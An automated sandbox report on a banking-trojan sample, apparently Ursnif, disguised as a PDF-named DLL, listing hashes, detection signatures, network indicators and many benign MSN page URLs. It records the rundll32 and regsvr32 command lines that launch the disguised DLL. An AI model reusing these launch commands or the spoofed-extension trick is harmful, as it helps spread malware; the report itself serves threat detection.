Play interactive tour

Edit tour

Analysis Report 606d810b8ff92.pdf.dll

Overview

General Information

Sample Name:	606d810b8ff92.pdf.dll
Analysis ID:	383181
MD5:	0deffc9d51035390ddb6e2934ed67186
SHA1:	b449c2ffdd33a3c79e17c781b11be3daf4ae46c4
SHA256:	6c99703002ea5284f603d0041f3a72b3a9e26f8f7af45a1f5e34e4297be0efb8
Tags:	BRTITA
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Execute DLL with spoofed extension

Sigma detected: Register DLL with spoofed extension

Yara detected Ursnif

Initial sample is a PE file and has a suspicious name

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Registers a DLL

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6092 cmdline: loaddll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4812 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5520 cmdline: rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 4792 cmdline: regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 2436 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4564 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2436 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 4804 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Charthea1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6176 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Claimdecide MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6268 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DeathBroad MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6284 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6528 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Meetfinish MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6564 cmdline: rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Mouththese MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

System Summary:

Sigma detected: Execute DLL with spoofed extension

Show sources

Source: Process started

Author: Joe Security: Data: Command: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1, CommandLine: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll', ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 6092, ProcessCommandLine: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll',#1, ProcessId: 4812

Sigma detected: Register DLL with spoofed extension

Show sources

Source: Process started

Author: Joe Security: Data: Command: regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll, CommandLine: regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: loaddll32.exe 'C:\Users\user\Desktop\606d810b8ff92.pdf.dll', ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 6092, ProcessCommandLine: regsvr32.exe /s C:\Users\user\Desktop\606d810b8ff92.pdf.dll, ProcessId: 4792

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: 606d810b8ff92.pdf.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.22.155.145:443 -> 192.168.2.3:49739 version: TLS 1.2

Source: 606d810b8ff92.pdf.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\Noon-blue\619\character\35\metal.pdb source: loaddll32.exe, 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.512693127.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.489776733.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.521614035.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.513127334.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.513519821.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.487835127.000000006E1EE000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.506080198.000000006E1EE000.00000002.00020000.sdmp, 606d810b8ff92.pdf.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DB953 FindFirstFileExA,FindNextFileA,FindClose,		0_2_6E1DB953
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DB597 FindFirstFileExA,		0_2_6E1DB597

Source: Joe Sandbox View

IP Address: 104.20.185.68 104.20.185.68

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: de-ch[1].htm.7.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbd4fa96b,0x01d72bdf</date><accdate>0xbd4fa96b,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbd4fa96b,0x01d72bdf</date><accdate>0xbd4fa96b,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbd52b6aa,0x01d72bdf</date><accdate>0xbd52b6aa,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbd52b6aa,0x01d72bdf</date><accdate>0xbd5352ec,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbd548b5d,0x01d72bdf</date><accdate>0xbd548b5d,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbd548b5d,0x01d72bdf</date><accdate>0xbd5527a4,0x01d72bdf</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.7.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.7.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: de-ch[1].htm.7.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.7.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.5.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.5.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.5.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.5.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.5.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.5.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.5.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.5.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1617789361&rver
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1617789361&rver=7.0.6730.0&am
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1617789362&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1617789361&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnJON.img?h=368&amp
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.7.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF75532A51FCF86B61.TMP.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/finanzen/top-stories/geld-ist-nicht-die-einzige-h%c3%bcrde-bei-der-suche-n
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/dann-gibt-es-eine-runde-s%c3%bcsses/ar-BB1fm0kZ?ocid=hplocalnew
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-jubil%c3%a4ums-millionen-fliessen-ins-corona-impfprogramm/a
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-neue-z%c3%bcrcher-steuererkl%c3%a4rung-sorgt-f%c3%bcr-begei
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/keine-nachtr%c3%a4gliche-therapie-f%c3%bcr-brutalen-vater/ar-BB
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kommentar-doch-publibike-ist-aus-dem-z%c3%bcrcher-stadtbild-weg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/landwirte-machen-platz-f%c3%bcr-moore/ar-BB1fmbtu?ocid=hplocaln
